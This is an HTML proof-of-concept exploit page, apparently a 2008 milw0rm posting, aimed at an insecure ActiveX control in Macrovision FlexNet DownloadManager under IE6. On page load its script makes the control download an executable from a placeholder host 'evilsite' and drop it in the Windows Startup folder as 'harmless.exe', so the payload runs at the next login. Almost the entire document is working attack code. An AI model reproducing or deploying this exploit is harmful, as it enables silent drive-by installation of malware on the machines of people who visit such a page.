35 lines
No EOL
955 B
HTML
35 lines
No EOL
955 B
HTML
<!--
|
|
Macrovision FlexNet DownloadManager Insecure Methods Exploit
|
|
Implemented Categories:
|
|
Category: Safe for Scripting
|
|
Written by e.b.
|
|
Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
|
|
-->
|
|
<html>
|
|
<head>
|
|
<title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
|
|
<script language="JavaScript" defer>
|
|
function Check() {
|
|
|
|
var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
|
|
|
|
mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
|
|
mJob.SetPriority(0);
|
|
mJob.SetNotifyFlags(2);
|
|
mJob.ScheduleInterval = 2;
|
|
|
|
obj.RunScheduledJobs();
|
|
|
|
|
|
}
|
|
|
|
</script>
|
|
</head>
|
|
<body onload="JavaScript: return Check();">
|
|
<object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
|
|
Unable to create object
|
|
</object>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2008-01-14] |